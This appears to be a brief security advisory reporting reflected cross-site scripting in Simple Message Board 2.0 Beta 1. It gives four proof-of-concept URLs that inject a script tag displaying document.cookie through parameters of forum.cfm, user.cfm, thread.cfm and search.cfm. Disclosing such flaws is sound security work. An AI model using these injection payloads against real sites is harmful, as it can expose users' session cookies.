XSS in forums Simple Message Board Version 2.0 Beta 1
[T]his BUGS discovered by rUnViRuS
Http://www.security-arab.com
=-=-=-=-=-=-=-=-=
xss in forums
Simple Message Board Version 2.0 Beta 1
Powered by Man and Machine, Ltd
Exploit
=-=-=-=
XSS in forum.cfm
http://www.example.com/forum/forum.cfm?FID=<script>JavaScript:alert(document.cookie);</script>
=-=-=-=-=-=-
XSS in user.cfm
http://www.example.com/forum/user.cfm?UID=<script>JavaScript:alert(document.cookie);</script>
=-=-=-=-=-=
XSS in thread.cfm
http://www.example.com/forum/thread.cfm?TID=<script>JavaScript:alert(document.cookie);</script>
=-=-==-=-=-=-=-
XSS IN search.cfm
http://www.example.com/forum/search.cfm?PostDate=<script>JavaScript:alert(document.cookie);</script>
=-=-=-=-=-=-=-=-=-=